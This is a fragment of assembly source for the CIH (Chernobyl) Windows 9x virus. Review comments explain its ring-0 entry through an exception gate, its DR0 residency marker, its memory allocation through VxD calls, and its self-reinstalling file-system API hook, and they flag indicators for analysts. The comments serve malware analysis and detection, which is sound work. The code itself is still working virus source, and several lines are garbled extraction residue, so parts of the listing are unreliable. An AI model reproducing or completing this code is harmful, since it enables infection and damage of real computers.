📄 cih14.txt
pop ebp
push 00401000h
OriginalAddressOfEntryPoint = $-4
ret
; MyExceptionHook -- handler body that ends in iretd, so it is entered
; through an interrupt/exception gate. The code that raises the exception
; and sets up EBX/EBP/ESI is outside this listing.
; Dispatch, as visible here:
;   ZF set     -> InstallMyFileSystemApiHook
;   DR0 == 0   -> AllocateSystemMemoryPage
;   otherwise  -> adjust the saved return address, then fall into ExitRing0Init
; DR0 is read here and written on the other paths, so it acts as the
; "already installed" marker; a debug register holding a non-zero value
; with no debugger in use is the residency artifact to look for.
MyExceptionHook:
; @2 is the base label for the self-relative "label-@2[reg]" operands.
@2 = MyExceptionHook
; ZF is not computed in this handler; it is inherited from the code that
; triggered the exception (not visible here).
jz InstallMyFileSystemApiHook
; ECX = DR0; jecxz branches when the marker is still zero.
mov ecx, dr0
jecxz AllocateSystemMemoryPage
; Marker already set: add an assembly-time label difference to the dword
; at [esp]. Presumably [esp] is the saved EIP of the interrupt frame, so
; the interrupted code resumes at a later label -- confirm against the
; full source.
; NOTE(review): the operand below appears to have been wrapped onto a
; second line by the page extraction; the two lines read as a single
; identifier and are left as found.
add dword ptr [esp], ReadyRestoreSE-ReturnAddressOf
dException
; ExitRing0Init -- common exit. Stores EBP as two 16-bit halves at
; [ebx-04h] and [ebx+02h], i.e. six bytes apart, which matches the split
; offset field of a 32-bit IDT gate descriptor. Presumably this puts the
; original handler address back; the values of EBX and EBP come from
; outside this view.
ExitRing0Init:
mov [ebx-04h], bp
shr ebp, 16
mov [ebx+02h], bp
; Return from the gate to the interrupted code.
iretd
; AllocateSystemMemoryPage -- reached from the handler only when DR0 was
; zero (the branch is a jecxz on ECX = DR0, so ECX == 0 on entry).
; Sets the DR0 marker, then issues a Win9x VxD dynamic-link call
; (int 20h followed by an inline dword service id; high word = device,
; low word = service) that the label names _PageAllocate.
; NOTE(review): this listing is incomplete -- several lines are comment
; residue and instructions appear to be missing before the final iretd.
AllocateSystemMemoryPage:
; Mark as present: DR0 = EBX (EBX is set outside this view).
mov dr0, ebx
; NOTE(review): next line is the tail of a truncated comment, not code.
in System
; Eight dword arguments, pushed last-to-first. Every "push ecx" pushes 0.
; Going by the VMM _PageAllocate prototype these would be flags (0fh),
; three zero/-1 address-range values, an alignment mask, a VM handle,
; a page type (1) and a page count (2) -- TODO confirm the mapping.
push 00000000fh
push ecx
push 0ffffffffh
push ecx
push ecx
push ecx
push 000000001h
push 000000002h
; VxD service call; the dword after int 20h is data consumed by the
; dispatcher, not an instruction. This int 20h + service-id byte pattern
; inside an ordinary executable is a usable static indicator.
int 20h
; Label on the inline service-id dword (device 0001h, service 0053h).
_PageAllocate = $
dd 00010053h
; Caller cleans the stack: 8 arguments * 4 bytes.
add esp, 08h*04h
; EDI = value returned in EAX (presumably the allocated linear address).
xchg edi, eax
; NOTE(review): next line is residue of a truncated comment, not code.
s
; EAX = ESI-relative address of MyVirusStart; ESI and the instructions
; that consume EAX are not visible in this listing.
lea eax, MyVirusStart-@2[esi]
iretd
; InstallMyFileSystemApiHook -- reached from the handler when ZF is set.
; Two things happen here:
;   1. FileSystemApiHook (addressed relative to EDI) is registered through
;      the VxD service the label names IFSMgr_InstallFileSystemApiHook,
;      and the call's return value is kept in DR0.
;   2. The dword stored at the inline call site is then used as a pointer:
;      the value it points to is saved in OldInstallFileSystemApiHook and
;      overwritten with the address of InstallFileSystemApiHook, so later
;      callers of the install service go through that wrapper.
; For triage: a file-system hook chain entry or an install-service pointer
; that resolves outside any loaded VxD image is the artifact this leaves.
; EDI, ESI and the @6 base label are defined outside this listing.
InstallMyFileSystemApiHook:
; EAX = address of FileSystemApiHook in the EDI-based copy; pushed as the
; single argument of the service call.
lea eax, FileSystemApiHook-@6[edi]
push eax
; Win9x VxD dynamic-link call: int 20h + inline dword service id
; (device 0040h, service 0067h).
int 20h
IFSMgr_InstallFileSystemApiHook = $
dd 00400067h
; Keep the service's return value in DR0 (presumably the previous-hook
; pointer, per IFSMgr semantics -- confirm). DR0 doubles as the
; "installed" marker tested by the handler.
mov dr0, eax
; NOTE(review): next line is residue of a truncated comment, not code.
ss
; Recover the pushed argument: EAX = address of FileSystemApiHook.
pop eax
; ECX = dword now stored at the inline call site. Presumably the system
; has rewritten that slot after the first call so it holds a pointer to
; the service's entry pointer -- TODO confirm.
mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
; Save the current target, then replace it with the wrapper's address.
; Both operands are addressed relative to EAX = FileSystemApiHook (= @3).
mov edx, [ecx]
mov OldInstallFileSystemApiHook-@3[eax], edx
lea eax, InstallFileSystemApiHook-@3[eax]
mov [ecx], eax
; Interrupts are masked for the exit path; the iretd there reloads
; EFLAGS from the interrupt frame.
cli
jmp ExitRing0Init
; Assembly-time constant: offset of this point in the section.
CodeSizeOfMergeVirusCodeSection = offset $
; InstallFileSystemApiHook -- wrapper that stands in for the original
; install-hook service (whose address is kept in
; OldInstallFileSystemApiHook). Sequence visible here:
;   1. remove this code's own FileSystemApiHook,
;   2. forward the caller's argument to the original service,
;   3. install FileSystemApiHook again through the original service,
;   4. store that second return value in DR0,
;   5. return the result of step 2 to the caller.
; The effect is that this code's hook is re-registered after every other
; hook installation; when reviewing a hook chain, an entry that always
; reappears as the most recently installed one is consistent with this.
; In:  [esp+4] on entry = caller's argument (stack-passed).
; Out: EAX = return value of the forwarded call. EBX preserved, ECX clobbered.
InstallFileSystemApiHook:
push ebx
; call/pop pair obtains the runtime address of @4 (position-independent).
call @4
@4:
pop ebx
; EBX = runtime address of FileSystemApiHook (= @3).
add ebx, FileSystemApiHook-@4
; Remove the own hook: VxD call, device 0040h, service 0068h.
push ebx
int 20h
IFSMgr_RemoveFileSystemApiHook = $
dd 00400068h
; Discard the argument pushed for the remove call.
pop eax
; Forward the caller's argument: with EBX saved on the stack, [esp+8]
; is the first argument of this wrapper.
push dword ptr [esp+8]
; Indirect call through the saved original service pointer
; (variable addressed relative to EBX = @3).
call OldInstallFileSystemApiHook-@3[ebx]
pop ecx
; Keep the forwarded call's result for the final return.
push eax
; Install the own hook again via the original service.
push ebx
call OldInstallFileSystemApiHook-@3[ebx]
pop ecx
; DR0 = return value of the re-install (presumably the new previous-hook
; pointer -- confirm against the consumer in FileSystemApiHook).
mov dr0, eax
; NOTE(review): next line is residue of a truncated comment, not code.
ress
; EAX = saved result of the forwarded call; restore EBX and return.
pop eax
pop ebx
ret
; Storage for the original install-service target; written by
; InstallMyFileSystemApiHook, uninitialised in the image.
OldInstallFileSystemApiHook dd ?
FileSystemApiHook:
@3 = FileSystemApiHook
pushad
call @5
@5:
pop esi
ss
add esi, VirusGameDataStartAddress-@5
test byte ptr (OnBusy-@6)[esi], 01h
jnz pIFSFunc
lea ebx, [esp+20h+04h+04h]
cmp dword ptr [ebx], 00000024h
jne prevhook
inc byte ptr (OnBusy-@6)[esi]
add esi, FileNameBuffer-@6
push esi
mov al, [ebx+04h]
cmp al, 0ffh
je CallUniToBCSPath
add al, 40h
mov ah, ':'
mov [esi], eax
inc esi
inc esi